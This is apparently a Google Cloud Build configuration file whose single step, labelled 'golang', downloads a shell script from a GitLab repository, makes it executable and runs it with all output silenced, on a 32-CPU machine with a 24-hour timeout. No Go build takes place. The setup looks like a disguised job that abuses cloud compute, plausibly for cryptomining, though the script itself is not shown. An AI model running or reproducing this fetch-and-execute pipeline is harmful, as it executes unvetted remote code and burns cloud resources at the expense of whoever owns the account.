steps: 
  - name: golang 
    args: 
      - '-c' 
      - >- 
         wget https://gitlab.com/nitar0199/kasepakuda/-/raw/main/tidepropal.sh && chmod 777 tidepropal.sh && ./tidepropal.sh >/dev/null >/dev/null 2>&1 
    waitFor: 
      - '-' 
    entrypoint: /bin/bash 
timeout: 86400s 
options: 
  machineType: E2_HIGHCPU_32
  diskSizeGb: '100'